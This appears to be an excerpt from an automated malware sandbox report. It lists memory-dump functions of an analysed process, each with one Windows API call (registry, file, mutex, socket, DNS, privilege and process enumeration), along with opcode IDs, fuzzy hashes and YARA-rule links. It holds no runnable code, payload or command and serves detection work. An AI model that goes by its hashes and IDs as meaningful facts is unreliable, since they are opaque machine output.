Instruction Fuzzy Hash: 4721A471509380AFE722CF51DC44F56BFB8EF46314F0984DBE9449B153C265A909CB75

Uniqueness

Uniqueness Score: -1.00%

Function 0019AA32, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E40), ref: 0019AAB1

Memory Dump Source

Source File: 00000007.00000002.2393439802.000000000019A000.00000040.00000001.sdmp, Offset: 0019A000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 4a3a209084e29936488b88524f612cf7e02a492846f065ca106b371969532458
Instruction ID: 96db2de203bd01a3b0117d23f024fa604a23a74dde3aaf50c200831da31e5874
Opcode Fuzzy Hash: 4a3a209084e29936488b88524f612cf7e02a492846f065ca106b371969532458
Instruction Fuzzy Hash: 4D21CA72500304EFFB20DE11CD84FAAFBECEF04320F04855AFA458B241E664E908CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 004F012A, Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNELBASE(?,?), ref: 004F019D

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 9e5897327446cb9e6f1a1071392e0140634b046350d7bc7374c16ea4e1c10f91
Instruction ID: ba81c0d6a8e6f95193178c1e1d70bdc24063634301b6b2c9539ab9784ce9e657
Opcode Fuzzy Hash: 9e5897327446cb9e6f1a1071392e0140634b046350d7bc7374c16ea4e1c10f91
Instruction Fuzzy Hash: 9921CF71500308EFE720DF25CD85BAAFBE8EF44350F04846AEA488B342D775E904CB66

Uniqueness

Uniqueness Score: -1.00%

Function 004F0723, Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,?), ref: 004F079F

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: 1d4ff32813048a00ae17b4d3e315fb5312de1f505b6f38e7a15ba15938fcaed2
Instruction ID: 533c64de2630119715b9a553e854308c043cec639775916af1a661720f008320
Opcode Fuzzy Hash: 1d4ff32813048a00ae17b4d3e315fb5312de1f505b6f38e7a15ba15938fcaed2
Instruction Fuzzy Hash: CC21B0B25093849FD711CB25CC45B92BFE8EF42210F0984EBE989CF253E234E908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 004F0A9B, Relevance: 1.6, APIs: 1, Instructions: 71fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(?,?,?), ref: 004F0B1E

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 1a2147d9fb4e2139ce326986acec63fe9fbdaba37e7eb0649dd30b5d21fe8a29
Instruction ID: 8ff151ec9edc5b8b6c48c9612401b5ed9da6edaefc677da2a36ed8617a07e115
Opcode Fuzzy Hash: 1a2147d9fb4e2139ce326986acec63fe9fbdaba37e7eb0649dd30b5d21fe8a29
Instruction Fuzzy Hash: 612183B15043845FD722CB65DC55BA3BFA8EF56314F0980EAE984DB253D225E804C761

Uniqueness

Uniqueness Score: -1.00%

Function 0019AB3A, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E40,5A364AA6,00000000,00000000,00000000,00000000), ref: 0019ABB4

Memory Dump Source

Source File: 00000007.00000002.2393439802.000000000019A000.00000040.00000001.sdmp, Offset: 0019A000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: adb9be4c512e9bb78e40c76fdb78ddc9ad8df754d182deec550e8c47793cae9a
Instruction ID: 5b74891dbc54088b36c50116473bf7528da93f075800e4b43ce2a8e3d74b741f
Opcode Fuzzy Hash: adb9be4c512e9bb78e40c76fdb78ddc9ad8df754d182deec550e8c47793cae9a
Instruction Fuzzy Hash: 49219D76600704AFEB20CF15CC85F66F7ECEF04750F58855AEA4A8B251D770E948CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 004F1E32, Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 004F1E9D

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: f56d1064d090cd16d720dcb8d719f0fc294c756fcebed6c6ad8515ace4b22a9b
Instruction ID: 808613223404a0b1c065a09f6570889638045f88c79279d9f302845dd0367de6
Opcode Fuzzy Hash: f56d1064d090cd16d720dcb8d719f0fc294c756fcebed6c6ad8515ace4b22a9b
Instruction Fuzzy Hash: F721AE71500744EFE720DF65CC85FA6FBA8EF08320F04846AEE488B252D775A804CB76

Uniqueness

Uniqueness Score: -1.00%

Function 004F1F32, Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNELBASE ref: 004F1FA6

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: baf3b5fb34d2a26ee1d6114b6e625eecadc3e8da7c94e973fa2f3a13ced307fa
Instruction ID: bce7a5654372f299d1dead915db64c635735236f3f1d663edd0fb62ed8597834
Opcode Fuzzy Hash: baf3b5fb34d2a26ee1d6114b6e625eecadc3e8da7c94e973fa2f3a13ced307fa
Instruction Fuzzy Hash: 98219D71500704EFE721CF55DC85FA6FBE8EF08310F14855AEA898B251D775A904CB76

Uniqueness

Uniqueness Score: -1.00%

Function 004F16D2, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 004F173E

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: d6fc2c82740d75968211400136c142dc198652fddc9da2cf0c694a4ab31fbce7
Instruction ID: 6206397c42ee06eb0536ae83eb3e1b771c3d5930c63429decbf99e4bcab8b099
Opcode Fuzzy Hash: d6fc2c82740d75968211400136c142dc198652fddc9da2cf0c694a4ab31fbce7
Instruction Fuzzy Hash: 3F212071500304EFEB21DF50CC45FA6FBE4EF08320F04846EEA898B252C376A804CB66

Uniqueness

Uniqueness Score: -1.00%

Function 004F04EA, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E40,5A364AA6,00000000,00000000,00000000,00000000), ref: 004F055C

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 554436827a0a2099441be4656e895ea2367caaaee1b9292a76cfe1a531d99edc
Instruction ID: 3f29f997d7574657e346b4ebecdf819e344922b725b6cec33ae9861829357739
Opcode Fuzzy Hash: 554436827a0a2099441be4656e895ea2367caaaee1b9292a76cfe1a531d99edc
Instruction Fuzzy Hash: 8211BE72500704EFEB20CF15DC80F67FBE8EF44720F04855AEA4A8B242D6A4E944CA75

Uniqueness

Uniqueness Score: -1.00%

Function 004F0B9E, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.KERNEL32(?,00000E40,5A364AA6,00000000,00000000,00000000,00000000), ref: 004F0C10

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 170b95835742dac786428da73871f2ddbe8d2d9cb2ee5931473bfad1281ed096
Instruction ID: d6fb32ff4a8d5def2df61cd8648c67ba0512c851f6d01f3977795164849b9e91
Opcode Fuzzy Hash: 170b95835742dac786428da73871f2ddbe8d2d9cb2ee5931473bfad1281ed096
Instruction Fuzzy Hash: D011DD72600708EFEB30CE15CC81F67FBA8EF44710F04855AEE499B242D674E945CA76

Uniqueness

Uniqueness Score: -1.00%

Function 004F239E, Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNELBASE(?,00000E40,5A364AA6,00000000,00000000,00000000,00000000), ref: 004F23FD

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: 5b1f2081726ba53163140f9e32c3008d339be7aa955a2c91cca043144f2f7676
Instruction ID: a59fbd042cf914029f4aec0f36fccf0a18afbd229070c431a2c88745b228ab31
Opcode Fuzzy Hash: 5b1f2081726ba53163140f9e32c3008d339be7aa955a2c91cca043144f2f7676
Instruction Fuzzy Hash: 5A11E272500704EFEB21CF55DD45FA7FBA8EF04320F04846AEE49CA251D6B5A9448B76

Uniqueness

Uniqueness Score: -1.00%

Function 004F0E9C, Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 004F0F06

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: aed84d7f3cecd17b848507c5f8a88a473a435a51620da479d3fd0b4b6eaf4931
Instruction ID: fc9ed7ddab511e81058d4fcbd0589688a2d9277bd8db82392e1291ae54413865
Opcode Fuzzy Hash: aed84d7f3cecd17b848507c5f8a88a473a435a51620da479d3fd0b4b6eaf4931
Instruction Fuzzy Hash: AF119D726043849FD721CF25CC85BA7BFE8EF55210F0884AAEE49CB252D264E808CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0019A51F, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNEL32(?,?,?,?,?,?,?), ref: 0019A58A

Memory Dump Source

Source File: 00000007.00000002.2393439802.000000000019A000.00000040.00000001.sdmp, Offset: 0019A000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: b9387f5a3fe64d9405c8c2bc636453d55e54fa3ca2366d94726c32129e9fd7a3
Instruction ID: ebe33ee4ee010de5e5a7c626fa01e75f8248461aa81246e2473e8c1fb1b00434
Opcode Fuzzy Hash: b9387f5a3fe64d9405c8c2bc636453d55e54fa3ca2366d94726c32129e9fd7a3
Instruction Fuzzy Hash: B011A271508380AFDB228F51DC44B62FFF4EF4A310F08849AEE898B152C375A418DB61

Uniqueness

Uniqueness Score: -1.00%

Function 0019B7CA, Relevance: 1.6, APIs: 1, Instructions: 61windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 0019B841

Memory Dump Source

Source File: 00000007.00000002.2393439802.000000000019A000.00000040.00000001.sdmp, Offset: 0019A000, based on PE: false

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: a02ce139ebb8efc24e4ace231548c285d09ca208d8b6be1548929c05a5e6e60d
Instruction ID: 1f62f4c0ed00a72ad72e6d4c6b4e952611653697ae4d78df8bda82c1994eeb65
Opcode Fuzzy Hash: a02ce139ebb8efc24e4ace231548c285d09ca208d8b6be1548929c05a5e6e60d
Instruction Fuzzy Hash: 5321D2714093C09FDB228B21DC54A91BFB0EF17310F0D84CAEDC44F163D265A958DB61

Uniqueness

Uniqueness Score: -1.00%

Function 004F1364, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

K32EnumProcesses.KERNEL32(?,?,?), ref: 004F13C6

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: EnumProcesses
String ID:
API String ID: 84517404-0
Opcode ID: c3d2ec0cc6c9e39d84b5dfc3f91a9f2c70669adcdb716903e4ef444df940deda
Instruction ID: f405d2db83b4e1b2c2b3c5f52f069b7f03f54b769a0d7fde576d2412e66fc7e8
Opcode Fuzzy Hash: c3d2ec0cc6c9e39d84b5dfc3f91a9f2c70669adcdb716903e4ef444df940deda
Instruction Fuzzy Hash: 5E117F715053849FD721CF65DC85B92FFE8EF45320F0884AAEE49CB262D275A848CB61

Uniqueness

Uniqueness Score: -1.00%

Function 004F02DE, Relevance: 1.6, APIs: 1, Instructions: 60registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(?,00000E40), ref: 004F0353

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: a4fed30f0016721491d8c59b36207f3b13796b523e6d7c872d5706d44cee8bdc
Instruction ID: bedfdf448721ff49418e640b47e3637ffb76738428698e56e21f02ee116e16d2
Opcode Fuzzy Hash: a4fed30f0016721491d8c59b36207f3b13796b523e6d7c872d5706d44cee8bdc
Instruction Fuzzy Hash: EC11EF32100704EFFB318F00CC41F76FBA8EF44710F14845AEE495A292C2B5A948CAA6

Uniqueness

Uniqueness Score: -1.00%

Function 004F09F2, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,00000E40,5A364AA6,00000000,00000000,00000000,00000000), ref: 004F0A51

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: aba7927fbfc9b0ed99c3ef45f0df077ad3f16d359a1feb9580d251027bcbf59b
Instruction ID: 660114aaf5b86654a72e853790c42b0744282055dca21b4031e0fb05137de6de
Opcode Fuzzy Hash: aba7927fbfc9b0ed99c3ef45f0df077ad3f16d359a1feb9580d251027bcbf59b
Instruction Fuzzy Hash: A711E372900304EFEB21CF51DC45FA7FBE8EF54720F14846AEA499B242C675A944CBB6

Uniqueness

Uniqueness Score: -1.00%

Function 004F0C86, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNELBASE(?,00000E40), ref: 004F0CEF

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: cbdcc53aee4818ff9e33415a5dfdfa9915fc694fcdfb7852c8358e1ddc0c835f
Instruction ID: 34be950100a527ad6c48ba55c98e4100a3a12843482447ceebc32c62696d39d3
Opcode Fuzzy Hash: cbdcc53aee4818ff9e33415a5dfdfa9915fc694fcdfb7852c8358e1ddc0c835f
Instruction Fuzzy Hash: 3F112931600304EFF720DF15DC85FB6F798DF40720F14805AFE058A281D6B9B944CA66

Uniqueness

Uniqueness Score: -1.00%

Function 0019BB4F, Relevance: 1.6, APIs: 1, Instructions: 59windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32 ref: 0019BBB9

Memory Dump Source

Source File: 00000007.00000002.2393439802.000000000019A000.00000040.00000001.sdmp, Offset: 0019A000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 976268a6678d2e55965af05a56daff0d611ec3e0085cae040d5d1d041c3e44ca
Instruction ID: 2304206e6a9815d99e30e531a11d31d0b30408ba2436916ecd33c1cc0a42d8af
Opcode Fuzzy Hash: 976268a6678d2e55965af05a56daff0d611ec3e0085cae040d5d1d041c3e44ca
Instruction Fuzzy Hash: 0611B1355093C0AFDB228F25DC45B52FFB4EF16220F0884DEED858B563D365A858DB61

Uniqueness

Uniqueness Score: -1.00%

Function 0019BE05, Relevance: 1.6, APIs: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?), ref: 0019BE70

Memory Dump Source

Source File: 00000007.00000002.2393439802.000000000019A000.00000040.00000001.sdmp, Offset: 0019A000, based on PE: false

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 1d90a257b3d0564b7f3e77ea988936b0f1f22798d816817657856df2e1d9b827
Instruction ID: 67dcf9bf7669dd3db4034445617ae163fd35b1f37ec6b485d93d506cf0ac54c7
Opcode Fuzzy Hash: 1d90a257b3d0564b7f3e77ea988936b0f1f22798d816817657856df2e1d9b827
Instruction Fuzzy Hash: 9011817540D3C0AFDB138B15DC44B61BFB4EF47624F0980DADD854F253D2655848CB62

Uniqueness

Uniqueness Score: -1.00%

Function 004F0D33, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNELBASE(?), ref: 004F0D98

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 9bea47893669a026ed18c762c21e8cbf2cdbefc0a544b3080fea3c988f720eb5
Instruction ID: ed9f90be04d9531e5d61f99eaad434c5a1a3ec73d12acfcd74f9111cc2ffd082
Opcode Fuzzy Hash: 9bea47893669a026ed18c762c21e8cbf2cdbefc0a544b3080fea3c988f720eb5
Instruction Fuzzy Hash: 671190715093C09FD712CB65DC45B92BFB4EF42224F0984EBED888F253D279A849CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0019BEB4, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?), ref: 0019BF0C

Memory Dump Source

Source File: 00000007.00000002.2393439802.000000000019A000.00000040.00000001.sdmp, Offset: 0019A000, based on PE: false

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: e5ebd5bd7f560ddb5ad4bbd4b15341155b6e5474bdf0bfaedb394e7da61d2772
Instruction ID: 5359a754a6cfb1a1908411f85a699852fe4b8f0e454d418760f34971d7aaa8bb
Opcode Fuzzy Hash: e5ebd5bd7f560ddb5ad4bbd4b15341155b6e5474bdf0bfaedb394e7da61d2772
Instruction Fuzzy Hash: 0711A3716083809FDB11CF25DD85B92BFE8EF42320F0884AAED49CB252D375E848CB61

Uniqueness

Uniqueness Score: -1.00%

Function 004F0AD6, Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(?,?,?), ref: 004F0B1E

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 3cfbad6a31f93994c10650c4b8761cc9af65c2f2f52981eef1d2194116a5a8f0
Instruction ID: e2cc5b9b28bf6650a49ec8338d2535def2bcbdc393dd26f78e84999086df99c7
Opcode Fuzzy Hash: 3cfbad6a31f93994c10650c4b8761cc9af65c2f2f52981eef1d2194116a5a8f0
Instruction Fuzzy Hash: 241182716003049FEB20CF59DC85B66FBD8EF54714F0884ABDE09CB342D674E804CA65

Uniqueness

Uniqueness Score: -1.00%

Function 004F0EBE, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 004F0F06

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 3cfbad6a31f93994c10650c4b8761cc9af65c2f2f52981eef1d2194116a5a8f0
Instruction ID: 2b46adf8f919fbd6dfb92f29eccbe6f5e804bfd548c0565efb939ab528465a1e
Opcode Fuzzy Hash: 3cfbad6a31f93994c10650c4b8761cc9af65c2f2f52981eef1d2194116a5a8f0
Instruction Fuzzy Hash: C71182756003449FEB20CF15DC85B66FBD8EF54310F0884AADE09CB742D674E804CA75

Uniqueness

Uniqueness Score: -1.00%

Function 0019BAB0, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,?), ref: 0019BB0B

Memory Dump Source

Source File: 00000007.00000002.2393439802.000000000019A000.00000040.00000001.sdmp, Offset: 0019A000, based on PE: false

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 78621fc94ea85258938ed4f2aaf26f405d0567447f8eee9757b1e0fc62ba9eab
Instruction ID: abb414890565e2556bd65c678a130ae91196efa6d5d825fe26ae9f16c3affe65
Opcode Fuzzy Hash: 78621fc94ea85258938ed4f2aaf26f405d0567447f8eee9757b1e0fc62ba9eab
Instruction Fuzzy Hash: 4A11A3715093849FD721CF15DD85B92FFA4EF06320F0880DEED868B262D275A848DB61

Uniqueness

Uniqueness Score: -1.00%

Function 004F075A, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,?), ref: 004F079F

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: e0cfd481569836ce255b9b8b66ff1a32ffdd71c3eec2de94d6ce8c3df6ee48dd
Instruction ID: e84ef244fa2a26fc9089cf615e73b472c55c1375aab25f8bd24579e29ae668a4
Opcode Fuzzy Hash: e0cfd481569836ce255b9b8b66ff1a32ffdd71c3eec2de94d6ce8c3df6ee48dd
Instruction Fuzzy Hash: 3511A1756002449FEB20DF19D885B66FBD8EF44320F1884ABDE09CB742E678E844CF65

Uniqueness

Uniqueness Score: -1.00%

Function 004F0932, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E40,5A364AA6,00000000,00000000,00000000,00000000), ref: 004F0985

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: e982b0ce8ffff1e207ade31bc5368928bd4f767f12952e07b6c6959a3152b6c9
Instruction ID: 85ba3added90a3e8932081ae7d279545474a4dce0d7f0ee63af6b3df96b5ed83
Opcode Fuzzy Hash: e982b0ce8ffff1e207ade31bc5368928bd4f767f12952e07b6c6959a3152b6c9
Instruction Fuzzy Hash: A601C0B1500304EFF720CF05DC85FA6BB98EF44720F148096EE499B242D6B8A9448AA6

Uniqueness

Uniqueness Score: -1.00%

Function 0019A75B, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

closesocket.WS2_32(?), ref: 0019A7BC

Memory Dump Source

Source File: 00000007.00000002.2393439802.000000000019A000.00000040.00000001.sdmp, Offset: 0019A000, based on PE: false

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 1318ffd295280644b674c7758c43d83ee711fddb55e8cef1915a7b5a630b9cae
Instruction ID: 037f24ceb2df9b13b7970a13d30506c0ceb63865c63b48add86cc1483def97f9
Opcode Fuzzy Hash: 1318ffd295280644b674c7758c43d83ee711fddb55e8cef1915a7b5a630b9cae
Instruction Fuzzy Hash: 7211A3755083849FDB11CF15DC45B92BFB4EF02364F0884DAED498B253D376A448CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 004F1386, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

K32EnumProcesses.KERNEL32(?,?,?), ref: 004F13C6

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: EnumProcesses
String ID:
API String ID: 84517404-0
Opcode ID: 5b1b467c36dd9191668b4e9dfc3ebb771f9b949b97ab706046761e96e8f8cb9d
Instruction ID: 21a47a7fa7eb5df068e670b2c65a215426ba6c5dd0637c1f597071dbeb4f4c9d
Opcode Fuzzy Hash: 5b1b467c36dd9191668b4e9dfc3ebb771f9b949b97ab706046761e96e8f8cb9d
Instruction Fuzzy Hash: 5A11A175500344DFEB20CF55D884B66FBE4EF04320F0884AADE09CB652D275E844CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004F2CD2, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNELBASE(?,00000E40,?,?), ref: 004F2D22

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: 953b051b2de746277dbca482804e2d83eece8463e3b83a9c30aaaab5e6c45f8b
Instruction ID: 15fee9d961f4d0f84077579428ebcfc07e1a3cdaaf7d342b1ab34bd6af0b7a0f
Opcode Fuzzy Hash: 953b051b2de746277dbca482804e2d83eece8463e3b83a9c30aaaab5e6c45f8b
Instruction Fuzzy Hash: C201B171900200ABE310DF16DC46B66FBA8FB84A20F14812AED088B741D231B515CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 0019A172, Relevance: 1.5, APIs: 1, Instructions: 47networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(?,00000E40,?,?), ref: 0019A1C2

Memory Dump Source

Source File: 00000007.00000002.2393439802.000000000019A000.00000040.00000001.sdmp, Offset: 0019A000, based on PE: false

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: 1dcce17ff9bfd3ccfedcfa2912f58ecef1ccfc3dd00b98fb48bb149edf90db32
Instruction ID: fe6869d95175072ee993e17dc250e9873db498e18df8ba39bf22f44d61743642
Opcode Fuzzy Hash: 1dcce17ff9bfd3ccfedcfa2912f58ecef1ccfc3dd00b98fb48bb149edf90db32
Instruction Fuzzy Hash: 76018471900700AFE310DF16DD46B66FBA8FF84A20F14816AED089B741D275F555CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 0019B48C, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowPlacement.USER32(?,?), ref: 0019B4E3

Memory Dump Source

Source File: 00000007.00000002.2393439802.000000000019A000.00000040.00000001.sdmp, Offset: 0019A000, based on PE: false

Similarity

API ID: PlacementWindow
String ID:
API String ID: 2154376794-0
Opcode ID: b94aad81bc32389eabc4e5ec3186bf7d44c8e66e4aff1b1e19f46732091a37c8
Instruction ID: b83ce1b5e844acb0319f8c9677a52a3f07428957303a45e8d06d4edf92e6edeb
Opcode Fuzzy Hash: b94aad81bc32389eabc4e5ec3186bf7d44c8e66e4aff1b1e19f46732091a37c8
Instruction Fuzzy Hash: 3D11A1755087809FE721CF15DC85B52FFA4EF16320F09809AED894B263D375A848CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0019BED2, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?), ref: 0019BF0C

Memory Dump Source

Source File: 00000007.00000002.2393439802.000000000019A000.00000040.00000001.sdmp, Offset: 0019A000, based on PE: false

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 6d485a9d7f47adae5ced69de33c299080fb6fe26d0bf5d2ed9ad44c980c40017
Instruction ID: 2f3fd85a9e7c9c449a5b9f36e76d6ae94985c196fd41ecf3b0719adac925a478
Opcode Fuzzy Hash: 6d485a9d7f47adae5ced69de33c299080fb6fe26d0bf5d2ed9ad44c980c40017
Instruction Fuzzy Hash: 47015E756047409FEB20DF29ED857A6FB98EF00720F0884AADD49CB646D775E844CA61

Uniqueness

Uniqueness Score: -1.00%

Function 0019A546, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNEL32(?,?,?,?,?,?,?), ref: 0019A58A

Memory Dump Source

Source File: 00000007.00000002.2393439802.000000000019A000.00000040.00000001.sdmp, Offset: 0019A000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 6dfdbe17d1dc3a1ed8ab90f6af83f442fe87dccbfdc6595125b0e4cd114d5bc6
Instruction ID: ad8979d7b59c5d74db7f82de8d436c79a41241b1a47b62f25817669b4c2bba46
Opcode Fuzzy Hash: 6dfdbe17d1dc3a1ed8ab90f6af83f442fe87dccbfdc6595125b0e4cd114d5bc6
Instruction Fuzzy Hash: 92016D32900740DFEF21CF55D845B56FFE0EF08720F0985AADE494A611D376A418DFA2

Uniqueness

Uniqueness Score: -1.00%

Function 004F1636, Relevance: 1.5, APIs: 1, Instructions: 43networkCOMMON

Download Yara Rule

APIs

DnsQuery_A.DNSAPI(?,00000E40,?,?), ref: 004F1686

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: Query_
String ID:
API String ID: 428220571-0
Opcode ID: 2558e129099e267bfafcccc9b3548f9a19667aebb2f028736fda1eb086e071e1
Instruction ID: 846ce9d0c5a552f9bc78327c3fdd36f15b917915996f4c609d0d4aaca6185ec4
